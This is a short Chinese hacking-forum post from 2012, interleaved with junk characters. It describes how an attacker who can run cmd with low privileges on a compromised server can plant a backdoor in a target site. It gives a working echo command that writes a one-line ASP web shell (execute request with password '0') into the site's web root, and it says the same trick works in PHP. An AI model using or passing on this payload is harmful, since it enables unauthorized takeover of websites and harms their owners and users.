在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。7 U$ p$ |& x* M" L3 _% x9 s
Z- }3 K8 `* \7 y9 D, {% R: o
命令格式% {' |. e, [: @3 d9 G j
+ Y l/ v; u( }9 D9 W7 qEcho 语句 >目标站绝对目录& t4 I0 U4 I+ M7 k- z
( ?0 A. K H+ D# `* i& F例如: . x0 q! d0 B# m: ]: A
/ m c; c9 ]( {echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
- @8 e; U3 Z) v' B( b: j( k/ K, g- `+ j+ K# D9 [! E9 J
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
- T4 b, U* [" J! z' m; k; O |
发表于 2012-9-23 14:40:24
收藏
支持
反对